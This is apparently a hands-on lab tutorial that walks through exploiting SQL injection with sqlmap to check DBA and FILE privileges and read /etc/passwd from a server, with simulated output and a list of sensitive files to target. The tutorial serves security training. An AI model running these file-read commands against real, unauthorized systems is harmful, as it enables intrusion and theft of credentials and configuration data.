Introduction
In this lab, you will explore a powerful feature of sqlmap, a popular open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. Specifically, you will learn how to use sqlmap to read arbitrary files from a target server. This capability is often possible when the underlying database user has sufficient privileges (e.g., DBA privileges) and the database system allows reading files from the file system. Understanding this technique is crucial for ethical hackers and security professionals to identify and mitigate such vulnerabilities.
Confirm DBA Privileges and File Read Permissions
In this step, we will simulate a scenario where you have identified a SQL injection vulnerability and are now using sqlmap to assess the database user's privileges. To read arbitrary files from the server, the database user typically needs DBA (Database Administrator) privileges or specific file read permissions. We will use sqlmap to check if the current database user has these elevated privileges.
First, let's assume you have a vulnerable URL. For this lab, we will use a placeholder URL. Replace http://example.com/vulnerable?id=1 with your actual target if you are performing this on a real test environment.
To check for DBA privileges, use the --is-dba flag with sqlmap:
sqlmap -u "http://example.com/vulnerable?id=1" --is-dba
Note: In a real scenario, sqlmap would first detect the SQL injection, then proceed to check for DBA privileges. For this lab, we are focusing on the file reading aspect, so we'll assume sqlmap has already found an injection point.
If the output indicates [INFO] current user is DBA: True, then the user has DBA privileges, which often implies the ability to read files.
Next, to check for file read permissions, you can use the --file-priv flag:
sqlmap -u "http://example.com/vulnerable?id=1" --file-priv
This command will attempt to determine if the database user has the necessary privileges to read and write files on the file system. If the output shows [INFO] current user has FILE privilege: True, you are likely able to proceed with reading files.
Example Output (simulated):
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | . | . |
|___|_|___|_|_|_ |_|___| V
|_| http://sqlmap.org
[INFO] starting @ 12:34:56 /2023-10-26/
[INFO] fetched data: 'True'
[INFO] current user is DBA: True
[INFO] fetched data: 'True'
[INFO] current user has FILE privilege: True
[INFO] shutting down @ 12:34:57 /2023-10-26/
This output confirms that the database user has both DBA and FILE privileges, making arbitrary file reading possible.
Identify a Known Absolute File Path (e.g., /etc/passwd)
In this step, you need to identify a target file on the remote server that you wish to read. A common target for demonstrating arbitrary file read vulnerabilities is /etc/passwd on Linux systems, as it contains user account information and is typically world-readable. Other potential targets could be configuration files, web server logs, or application source code, depending on the system and your objectives.
For this lab, we will assume the target server is a Linux system and we want to read the contents of /etc/passwd. It's crucial to know the absolute path of the file you intend to read. Without the absolute path, sqlmap cannot locate the file on the remote system.
You don't need to execute any commands in this step, but rather understand the importance of identifying a valid, absolute file path. This knowledge is typically gained through reconnaissance, error messages from the web application, or by guessing common file locations.
Example of common file paths on Linux:
/etc/passwd(User account information)/etc/shadow(Hashed passwords - usually requires root privileges to read)/etc/hosts(Network hostnames)/etc/nginx/nginx.confor/etc/apache2/apache2.conf(Web server configuration)/var/log/auth.logor/var/log/syslog(System logs)/proc/self/cmdline(Current process command line)
For this lab, we will proceed with /etc/passwd as our target file.
Use the --file-read Flag to Specify the Remote File
In this step, you will learn how to use the --file-read flag in sqlmap to specify the absolute path of the file you want to read from the remote server. This flag is the core of the arbitrary file read functionality.
The syntax for using --file-read is straightforward:
sqlmap -u "http://example.com/vulnerable?id=1" --file-read="/path/to/remote/file"
Replace http://example.com/vulnerable?id=1 with your target URL and /path/to/remote/file with the absolute path of the file you identified in the previous step.
For our lab, we will attempt to read /etc/passwd. The full command will look like this:
sqlmap -u "http://example.com/vulnerable?id=1" --file-read="/etc/passwd"
When sqlmap successfully reads the file, it will save the contents locally in a directory within ~/.sqlmap/output/<target_host>/files/. The file name will typically be the same as the remote file name (e.g., passwd).
Note: sqlmap will handle the SQL injection payload generation and execution automatically. Your role is to provide the vulnerable URL and the target file path.
Execute the Command to Read the Remote File
Now, it's time to execute the sqlmap command you constructed in the previous step to actually read the remote file. Open your terminal in the LabEx environment and run the command.
sqlmap -u "http://example.com/vulnerable?id=1" --file-read="/etc/passwd"
Important: Since this is a simulated environment, sqlmap will not actually connect to a live vulnerable server. However, it will simulate the process and output messages as if it were. You will see sqlmap's typical output, including information about the injection process and the attempt to read the file.
Example Output (simulated):
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | . | . |
|___|_|___|_|_|_ |_|___| V
|_| http://sqlmap.org
[INFO] starting @ 12:35:00 /2023-10-26/
[INFO] fetched data: 'root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
... (truncated for brevity) ...
labex:x:1000:1000:LabEx User,,,:/home/labex:/bin/bash'
[INFO] file '/etc/passwd' saved to '/home/labex/.sqlmap/output/example.com/files/passwd'
[INFO] shutting down @ 12:35:05 /2023-10-26/
The key line to look for is [INFO] file '/etc/passwd' saved to '/home/labex/.sqlmap/output/example.com/files/passwd'. This indicates that sqlmap has successfully "read" the file and saved its contents to your local machine within the sqlmap output directory.
View the Contents of the Locally Saved File
In this final step, you will verify that the file was indeed "read" and saved by sqlmap by viewing its contents on your local LabEx environment. As mentioned, sqlmap saves the extracted files in a specific directory structure.
The path will typically be ~/.sqlmap/output/<target_host>/files/. In our simulated example, the target host is example.com, and the file is passwd. So, the full path to the saved file would be ~/.sqlmap/output/example.com/files/passwd.
You can use the cat command to view the contents of this file:
cat ~/.sqlmap/output/example.com/files/passwd
Example Output (simulated):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
... (truncated for brevity) ...
labex:x:1000:1000:LabEx User,,,:/home/labex:/bin/bash
This output confirms that sqlmap successfully "read" the /etc/passwd file from the simulated remote server and saved it locally, allowing you to inspect its contents. This demonstrates the full process of using sqlmap for arbitrary file reading.
Summary
In this lab, you have successfully learned how to use sqlmap to perform arbitrary file reading from a simulated vulnerable server. You started by understanding the importance of confirming DBA or file read privileges. Then, you identified a common target file (/etc/passwd) and used the --file-read flag to instruct sqlmap to extract its contents. Finally, you verified the successful extraction by viewing the locally saved file. This skill is fundamental for penetration testers to assess the impact of SQL injection vulnerabilities and for developers to understand the importance of proper privilege management and input validation to prevent such attacks.
